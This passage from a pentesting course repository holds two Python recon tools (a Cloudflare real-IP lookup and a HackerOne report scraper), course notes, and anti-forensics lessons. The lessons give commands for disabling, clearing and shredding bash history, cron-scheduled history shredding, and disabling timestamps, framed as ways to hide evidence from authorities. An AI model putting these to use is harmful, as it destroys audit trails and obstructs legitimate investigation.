response_json["records"] 47 | 48 | for data in responseData: 49 | try: 50 | ip = data['values'][0]['ip'] 51 | org = data['organizations'][0] 52 | date = data['last_seen'] 53 | if org == "Cloudflare, Inc.": 54 | pass 55 | else: 56 | print("The Real IP of Domain may be : ",blue+ip+reset) 57 | print("The Organization of Domain Hosted is : ",blue+org+reset) 58 | print("This IP is Last seen on : ",blue+ date +reset) 59 | print() 60 | except: IndexError 61 | -------------------------------------------------------------------------------- /MPC_python_tools/writeup_finder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | Tool Creater : Dr.404 4 | Tools Version : 1.0.1 5 | Organization : Myanmar Pentester Community 6 | 7 | Google Search Scraper for HackerOne Reports 8 | 9 | This tool allows you to scrape Google search results to find reports on hackerone.com based on an intext query. 10 | It supports scraping multiple pages and dynamically searching for topics using intext queries. 11 | 12 | Usage: 13 | hackerone_scraper.py -q QUERY [-n NUM_PAGES] [-o OUTPUT_FILE] 14 | 15 | Example: 16 | hackerone_scraper.py -q "graphql" -n 5 -o reports.txt 17 | 18 | Options: 19 | -q, --query The intext search query (e.g., "graphql", "XSS", etc.) 20 | -n, --num_pages (Optional) The number of Google search result pages to scrape. Default is 5. 21 | -o, --output (Optional) The file to save the output links. If not provided, outputs to console. 22 | 23 | Note: 24 | Use responsibly and beware of Google’s scraping limitations. 25 | """ 26 | 27 | import requests 28 | from bs4 import BeautifulSoup 29 | import re 30 | import time 31 | import argparse 32 | import sys 33 | from colorama import Fore, Style, init 34 | 35 | # Initialize colorama 36 | init(autoreset=True) 37 | 38 | class HackerOneScraper: 39 | def __init__(self, query, num_pages=5, output_file=None): 40 | self.query = query 41 | self.num_pages = num_pages 42 | self.output_file = output_file 43 | self.links = [] 44 | 45 | def extract_links_from_page(self, start): 46 | """Extract links from a single Google search result page.""" 47 | url = "https://www.google.com/search" 48 | params = { 49 | 'q': self.query, 50 | 'start': start 51 | } 52 | 53 | # Headers to mimic a browser request 54 | headers = { 55 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 56 | } 57 | 58 | # Make the GET request 59 | response = requests.get(url, headers=headers, params=params) 60 | 61 | # Parse the HTML response 62 | soup = BeautifulSoup(response.text, "html.parser") 63 | 64 | # Find all tags in the result 65 | for link in soup.find_all("a"): 66 | href = link.get("href") 67 | # Check if 'url=' is in the href and process only those Google search result links 68 | if href and "/url?" in href: 69 | # Use regex to extract the real URL 70 | match = re.search(r'url=(https://hackerone.com/reports.+?)&', href) 71 | if match: 72 | actual_url = match.group(1) 73 | self.links.append(actual_url) 74 | 75 | def scrape(self): 76 | """Main logic to scrape multiple pages.""" 77 | for page_num in range(self.num_pages): 78 | start = page_num * 10 79 | self.extract_links_from_page(start) 80 | 81 | # Sleep to avoid being blocked by Google 82 | time.sleep(2) 83 | 84 | def output_results(self): 85 | """Output the results to a file or console.""" 86 | if self.output_file: 87 | with open(self.output_file, 'w') as f: 88 | for link in self.links: 89 | f.write(link + '\n') 90 | print(Fore.GREEN + f"\nFound {len(self.links)} links. Saved to '{self.output_file}'.") 91 | else: 92 | if self.links: 93 | print(Fore.GREEN + "\nFound the following report links:") 94 | for link in self.links: 95 | print(Fore.CYAN + link) 96 | else: 97 | print(Fore.RED + "\nNo report links found.") 98 | 99 | def main(): 100 | # Argument parser setup 101 | parser = argparse.ArgumentParser(description="Google Search Scraper for HackerOne Reports") 102 | 103 | # Define arguments 104 | parser.add_argument('-q', '--query', type=str, required=True, help='The intext search query (e.g., "graphql", "XSS", etc.)') 105 | parser.add_argument('-n', '--num_pages', type=int, default=5, help='The number of Google search result pages to scrape. Default is 5.') 106 | parser.add_argument('-o', '--output', type=str, help='The file to save the output links. If not provided, outputs to console.') 107 | 108 | # Parse command-line arguments 109 | args = parser.parse_args() 110 | 111 | # Create an instance of HackerOneScraper 112 | scraper = HackerOneScraper(f"site:hackerone.com intext:{args.query}", args.num_pages, args.output) 113 | 114 | # Run the scraper 115 | print(Fore.YELLOW + f"Searching for reports related to '{args.query}' on HackerOne...") 116 | scraper.scrape() 117 | scraper.output_results() 118 | 119 | if __name__ == '__main__': 120 | main() 121 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Myanmar Pentester Community (MPC) Linux and Webhacking Class 2 | 3 | #### **Instructor - Dr. Htun Aung Kyaw (Dr.404)** 4 | #### **Contact - 095068759** 5 | 6 | 7 | ## Course Introudction and Class Roadmap 8 | 9 | - This resouse belong to **Myanmar pentester Community** (**All in one**) Class 10 | 11 | - You can read all class lecture notes in [Lesson_Notes](./lesson_notes) 12 | 13 | - You can read Docker Course notes in [Docker](./lesson_notes/docker_course) 14 | 15 | - If you are not MPC student, You can view and find couse ouline in [Course_Outline](./course_outline) 16 | 17 | - You can download Dr.404 python Tools in [Dr.404 tools](./MPC_python_tools) but please give credit for commucial use 18 | 19 | - You can download shells in [shell](./shells) (This shell is not own by MPC, Credit to original uploader) 20 | 21 | - You can view research paper (Acedamic Purpose) about hacking and pentesting in [Research Paper](./lesson_notes/Paper) 22 | 23 | 24 | # Buy me a coffee 25 | 26 | >## [Wave, Kpay, AyarPay] - 095068759 27 | > -------------------------------------------------------------------------------- /course_outline/mpc_class_outline.md: -------------------------------------------------------------------------------- 1 | # MPC Linux + Web-Hacking Foundation Class Introduction 2 | 3 | ## The term "hacking" in this class mean...... 4 | 5 | 1. Not for stealing social media account 6 | 2. Not for phishing 7 | 3. Not for Defacement 8 | 9 | 10 | ## The term "hacking" in this class mean...... 11 | 1. Bug Bounty 12 | 2. CTF 13 | 3. pentration testing 14 | 4. Learning and Problem solving 15 | 16 | 17 | # Course Outline 18 | 19 | ![Course Outline](./photo/outline.png) 20 | 21 | -------------------------------------------------------------------------------- /course_outline/photo/outline.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/course_outline/photo/outline.png -------------------------------------------------------------------------------- /gitPush.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | read -p 'Write your commit?: ' commit 4 | 5 | git add . 6 | git commit -m "$commit" 7 | git push -u origin main 8 | -------------------------------------------------------------------------------- /lesson_notes/Anit_forensics(Mini_Course)/AnitForensive_Day2.md: -------------------------------------------------------------------------------- 1 | # Anti-Forensive Day-2 2 | 3 | ## Securing Your Credential 4 | 5 | 1. Never store password on Browser 6 | 2. Use Password Manager 7 | 8 | ## Securing your message (encryption continue) 9 | 10 | Cyberchef download lin 11 | `https://github.com/gchq/CyberChef/releases/download/v9.46.0/CyberChef_v9.46.0.zip` 12 | 13 | ## Overwriting Metadata 14 | 15 | - The Windows registry key 16 | `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate` can be set to “1” to 17 | disable updating of the last-accessed timestamp; 18 | 19 | ## Data Wiping 20 | 21 | - scure data deletion 22 | 23 | ``` 24 | Bleach-Bit (window) 25 | Shradder (Linux) 26 | iShradder (andorid) 27 | ``` 28 | 29 | ## In linux 30 | 31 | `sudo apt install bleachbit` 32 | 33 | US DOD (Department of Defense) standard Wiping 34 | 35 | - Overwrit Drive with 0 36 | - Overwirt Drive with 1 37 | - Overwerit Drive with Random Data 38 | 39 | Elliot use this standard in Mr. Robot Series 40 | 41 | 42 | `shred -f -n 3 test.txt` 43 | 44 | 45 | 46 | ``` 47 | f = Forces the change of permission 48 | 49 | n = overwirte times 50 | ``` -------------------------------------------------------------------------------- /lesson_notes/Anit_forensics(Mini_Course)/AntiForensive_Methodology.md: -------------------------------------------------------------------------------- 1 | # Anti-forensics 2 | 3 | #### Credit `@dnsprincess` for all methodology 4 | 5 | 1. Avoiding detection 6 | 2. Disrupting the collection of information 7 | 3. Incresing the time that examiner to spend on a case 8 | 9 | 10 | # General Methodology 11 | 12 | 1. Encryption 13 | 2. Misdirection 14 | 3. Changing Timestamps 15 | 3. Secure Data Wiping 16 | 4. Stegnography 17 | 18 | ## Level of Hiding 19 | 20 | #### 1. From Your family (security controls) 21 | eg. Privat content 22 | * Use Vaulit application or change extension 23 | * Low anit-forensic use 24 | * Tools easily found online 25 | 26 | 27 | #### 2. Local Authorithies (Obfuscate) 28 | eg. Small incidents 29 | * They may understand beginner level forensics 30 | * They use package like Cellebrite, Autospsy, etc... 31 | * Tools dependent 32 | * Mildly intrusive anti-forensics 33 | 34 | Our Tools 35 | * Hex editor 36 | * Forensic packages 37 | * Removal media 38 | * Decoy, Fasle fruit 39 | 40 | 41 | #### 3. Special Agent (???) (unusable evidence) 42 | eg. Interstate Action ?? 43 | More proficients, not tool dependent 44 | 45 | Our Tools 46 | * End-to-End Enryption 47 | * Autopsy 48 | * SpiderOak 49 | * Bunner device 50 | * Soldered storage media 51 | 52 | #### 4. Nation or State Op?? (burn) 53 | Espionage 54 | Bun all down 55 | 56 | 57 | #### Strategy 58 | 59 | 1. Evidence Doubt - Your family , Local Auth 60 | 2. Attribution Doubt - Agents 61 | 62 | 63 | # Specific Technique 64 | 65 | ## Your Family, Local Auth 66 | 67 | #### 1. Renaming file extension (Your Family, Local Auth) 68 | #### 2. Vault App (Forensive Tools can easily found ) 69 | #### 3. Changing file header - Forensics software can detect file header 70 | #### 4. Steganography 71 | ``` 72 | Don't Leave any trace of stego application on your system 73 | Check against Stegdetect 74 | StegFS in Linux 75 | ``` 76 | 77 | ## Special Agent && Nation State ?? 78 | 79 | #### 5. Shredding - Completely Delete and Overwirte Disk Space 80 | #### 6. Timestomp (To defeat timelin analysis in forensics ) 81 | 82 | 83 | #### Thing you need to delete 84 | 85 | 1. All file fragments 86 | 2. All metadata 87 | 3. Traced item (THumbnails) 88 | 89 | 90 | # Practical Anti-Forensive 91 | 92 | #### 1. Misdirection 93 | 94 | 1. Renaming File extension 95 | 2. Changing file header 96 | 3. Timestomping 97 | 98 | 99 | #### 2. Encryption 100 | 101 | 1. aescrypt (GUI + CLI) 102 | 103 | 104 | #### 3. File Wiping (Shredding) 105 | 106 | Normal Data Wipe 107 | 108 | - use bleachbit 109 | 110 | In linux 111 | 112 | `sudo apt install bleachbit` 113 | 114 | US DOD (Department of Defense) standard Wiping 115 | 116 | - Overwrit Drive with 0 117 | - Overwirt Drive with 1 118 | - Overwerit Drive with Random Data 119 | 120 | Elliot use this standard in Mr. Robot Series 121 | 122 | 123 | `shred -f -n 3 test.txt` 124 | 125 | 126 | 127 | ``` 128 | f = Forces the change of permission 129 | 130 | n = overwirte times 131 | ``` 132 | 133 | 134 | 135 | -------------------------------------------------------------------------------- /lesson_notes/Anit_forensics(Mini_Course)/note.md: -------------------------------------------------------------------------------- 1 | # Anit-forensics 2 | 3 | ## BleachBIt 4 | 5 | BleachBit is a free and open-source software that rather than just delete files, actually shreds the files and any slack space making it virtually impossible to recover affected files. Not only that, but BleachBit is smart enough to remove other traces of files and applications that forensic investigators can find such as Most Recently Used (MRU), PreFetech files, clipboard contents, cookies, history files, temp files, memory dump, uninstallers and more. 6 | 7 | ####Belachbit download links 8 | 9 | `http://www.bleachbit.org/download` 10 | 11 | #### For Kali-Linux 12 | 13 | `sudo apt install bleachbit` 14 | 15 | #### BleachBit usage in Linux 16 | 17 | `shred -f -n 3 test.txt` 18 | 19 | ``` 20 | f = Forces the change of permission 21 | 22 | n = overwirte times 23 | 24 | Elliot use these command in Mr. Robot series 25 | ``` 26 | 27 | ## Linux Bash shell Anit-Forensics 28 | #### 1. Diabling History 29 | 30 | `export HISTSIZE=0` 31 | 32 | #### 2. Clearing History 33 | 34 | `history -c` 35 | 36 | #### 3. Clearing User Complete History 37 | 38 | `cat /dev/null > ~.bash_history && history -c && exit` 39 | 40 | # ****USED WITH CAUTION**** 41 | 42 | #### 4. Shreadding the history (use with caution) 43 | 44 | `shred ~/.bash_history` 45 | 46 | #### 5. Automating the Clearing of Command History 47 | 48 | ``` 49 | crontab -e 50 | 51 | * * * shred ~/.bash_history && cat /dev/null > .bash_history 52 | ``` 53 | This command will execute each morning at 1am, first shredding the bash_history and then erasing the bash_history. Note, that I did not include the history -c command as it is an internal BASH shell command and can not be used in crontab. 54 | 55 | 56 | # Hax Editor 57 | 58 | #### Window HexEditor 59 | 60 | `WinHex` 61 | 62 | #### stegno in windwo 63 | 64 | `Quick stegno` 65 | `stool` 66 | 67 | # Encryption 68 | 69 | `aescrypt` 70 | 71 | `veracyrpt` 72 | `kleopatra` -------------------------------------------------------------------------------- /lesson_notes/Paper/Anti_Forencis/Anti-Forensic Techniques_1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/Anti_Forencis/Anti-Forensic Techniques_1.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/Anti_Forencis/Anti-Forensics-LayerOne-Paul_Henry.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/Anti_Forencis/Anti-Forensics-LayerOne-Paul_Henry.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/Anti_Forencis/anti-forensics-aide.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/Anti_Forencis/anti-forensics-aide.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/DBMS_7thEdition.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/DBMS_7thEdition.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/A Study of Out-of-Band SQL Injection.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/A Study of Out-of-Band SQL Injection.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/A_novel_method_for_SQL_injection_attack_detection_.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/A_novel_method_for_SQL_injection_attack_detection_.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/Boolean_based_SQLi_1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/Boolean_based_SQLi_1.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/Boolean_based_SQLi_2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/Boolean_based_SQLi_2.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/ErrorBaseDoubleQueryInjection.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/ErrorBaseDoubleQueryInjection.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/ErrorBaseDoubleQueryInjection_2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/ErrorBaseDoubleQueryInjection_2.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/ErrorBaseDoubleQueryInjection_3.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/ErrorBaseDoubleQueryInjection_3.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/The Ultimate Guide to SQL Injection _ PurpleBox.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/The Ultimate Guide to SQL Injection _ PurpleBox.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/SQL_Injection/sql2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/SQL_Injection/sql2.png -------------------------------------------------------------------------------- /lesson_notes/Paper/fileUploadVulnerabity.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/lesson_notes/Paper/fileUploadVulnerabity.pdf -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as 6 | contributors and maintainers pledge to making participation in our project and 7 | our community a harassment-free experience for everyone, regardless of age, body 8 | size, disability, ethnicity, sex characteristics, gender identity and expression, 9 | level of experience, education, socio-economic status, nationality, personal 10 | appearance, race, religion, or sexual identity and orientation. 11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at theinfecteddrake@gmail.com. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html 72 | 73 | [homepage]: https://www.contributor-covenant.org 74 | 75 | For answers to common questions about this code of conduct, see 76 | https://www.contributor-covenant.org/faq 77 | -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | I appreciate and recognize [all contributors](https://github.com/0xInfection/awesome-waf/graphs/contributors). 2 | 3 | > First of all thank you for even considering of contributing to this awesome list. __"The community just learns from each other"__. 4 | 5 | ## Table of Contents 6 | 7 | - [Contribution guidelines](#contribution-guidelines) 8 | - [Quality Standard](#quality-standard) 9 | - [Adding to this list](#adding-to-this-list) 10 | - [Adding something to an awesome list](#adding-something-to-an-awesome-list) 11 | - [Updating your Pull Request](#updating-your-pull-request) 12 | 13 | ## Contribution Guidelines 14 | 15 | __Your pull request/commit message will be a tweet, please keep that in mind.__ :) 16 | 17 | - **To add to the list:** Submit a pull request. 18 | - **To remove from the list:** Submit a pull request. 19 | - Want to change something: Submit a pull request. 20 | - Want to try something else: Submit a pull request. 21 | - Don't know what to do: Submit a pull request or open an issue, let me know what's going on. 22 | 23 | [Awesome-WAF](https://github.com/0xinfection/awesome-waf) is a hand-crafted list for high-quality information about web application firewalls and its resources. Following items are recommended to be kept in mind. 24 | 25 | - If you are submitting a new fingerprint, include the headers/page source, etc. 26 | - Do not include the URL as it may expose the integrity of the site. 27 | > I will contact you personally if necessary via email. 28 | - Item you're adding should not be duplicate, no redirection (be careful with `http` vs `https`!). 29 | - The link should be the name of the slide or project or website. 30 | - Description should be clear and concise (read it out loud to be sure). 31 | - Description should follow the link, on the same line. 32 | - if you want to add more than one link, please don't do all PR on the exact same line, it usually results in conflicts and your PR cannot be automatically merged. 33 | 34 | Please contribute links to slides/tools you have used or are familiar with. This will help ensure high-quality entries. 35 | 36 | ## Quality Standard 37 | 38 | Note that we can help you achieve those standards, just try your best, be brave. 39 | We'll guide you to the best of our abilities. 40 | 41 | To be on the list, it would be *nice* if entries adhere to these quality standards: 42 | 43 | - Generally useful to the community. 44 | - Clearly stating "what is it for": mention the problem it solves. Just try your best, make it clear for the next person. 45 | - Solves a real problem (even a small one) 46 | - If your PR is a **WIP** (work in progress, not safe for production), mention it. 47 | 48 | If your PR is not merged, I will tell you why so that you may be able to improve it. 49 | 50 | ## Contribution Guidelines 51 | 52 | ### Adding to this List 53 | 54 | Please ensure your pull request adheres to the following guidelines: 55 | 56 | - Search previous suggestions before making a new one, as yours may be a duplicate. 57 | - Make sure the list is useful before submitting. That implies it has enough content and every item has a good succinct description. 58 | - Make an individual pull request for each suggestion. 59 | - Use [title-casing](http://titlecapitalization.com) (AP style). 60 | - Use the following format: `[List Name](link)` 61 | - Link additions should be added to the bottom of the relevant category. 62 | - New categories or improvements to the existing categorization are welcome. 63 | - Check your spelling and grammar. 64 | - Make sure your text editor is set to remove trailing whitespace. 65 | - The pull request and commit should have a useful title. 66 | - The body of your commit message should contain a link to the repository. 67 | 68 | Thank you for your contributions! 69 | 70 | ### Adding something to an Awesome List 71 | 72 | If you have something awesome to contribute to an awesome list, this is how you do it. 73 | 74 | You'll need a [GitHub account](https://github.com/join)! 75 | 76 | 1. Access the awesome list's GitHub page. For example: https://github.com/sindresorhus/awesome 77 | 2. Click on the `readme.md` file: 78 | 79 | ![Step 2 Click on Readme.md](https://cloud.githubusercontent.com/assets/170270/9402920/53a7e3ea-480c-11e5-9d81-aecf64be55eb.png) 80 | 81 | 3. Now click on the edit icon. 82 | 83 | ![Step 3 - Click on Edit](https://cloud.githubusercontent.com/assets/170270/9402927/6506af22-480c-11e5-8c18-7ea823530099.png) 84 | 85 | 4. You can start editing the text of the file in the in-browser editor. Make sure you follow guidelines above. You can use [GitHub Flavored Markdown](https://help.github.com/articles/github-flavored-markdown/). 86 | 87 | ![Step 4 - Edit the file](https://cloud.githubusercontent.com/assets/170270/9402932/7301c3a0-480c-11e5-81f5-7e343b71674f.png) 88 | 89 | 5. Say why you're proposing the changes, and then click on "Propose file change". 90 | 91 | ![Step 5 - Propose Changes](https://cloud.githubusercontent.com/assets/170270/9402937/7dd0652a-480c-11e5-9138-bd14244593d5.png) 92 | 93 | 6. Submit the [pull request](https://help.github.com/articles/using-pull-requests/)! 94 | 95 | ### Updating your Pull Request 96 | 97 | Sometimes, a maintainer of an awesome list will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the awesome-* list guidelines. 98 | 99 | [Here](https://github.com/RichardLitt/knowledge/blob/master/github/amending-a-commit-guide.md) is a write up on how to change a Pull Request, and the different ways you can do that. -------------------------------------------------------------------------------- /lesson_notes/Paper/firewallBypass/LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any 